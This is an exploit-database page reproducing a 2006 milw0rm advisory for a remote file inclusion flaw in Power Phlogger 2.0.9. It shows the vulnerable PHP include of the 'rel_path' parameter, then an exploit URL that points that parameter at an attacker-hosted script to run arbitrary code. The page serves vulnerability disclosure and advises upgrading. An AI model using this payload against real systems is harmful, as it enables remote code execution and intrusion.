header-logo
Suggest Exploit
vendor:
Power Phlogger
by:
x_w0x
7.5
CVSS
HIGH
Remote|Local File Include Vulnerability
98
CWE
Product Name: Power Phlogger
Affected Version From: 2.0.9
Affected Version To: 2.0.9
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Power Phlogger 2.0.9

A vulnerability exists in Power Phlogger 2.0.9 which allows an attacker to include a remote file by using the 'rel_path' parameter in the config.inc.php3 script. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of Power Phlogger.
Source

Exploit-DB raw data:

#################################
# Power Phlogger 2.0.9 -        #
#################################
#Class:     Remote|Local File Include Vulnerability
# Remote:    Yes
# Local:     No
# Type:      High
# Site:      http://www.comscripts.com/scripts/php.power-phlogger.211.html #
# Author:    x_w0x
# Contact:   x_w0x@hotmail.com
###################################
#Vuln Code
(config.inc.php3):
<?php
include $rel_path."functions.php3";//nothing here
?>

#
http://victim.com/[Power Phlogger 2.0.9]/config.inc.php3?rel_path=http://DarknesseScript.txt


#Gr££tz:makoki, azzcoder,xoron,osm@n
#Speciale gr££tz: str0ke, and elite-team

# milw0rm.com [2006-10-19]

Navigation

Suggest Exploit

Services By CQR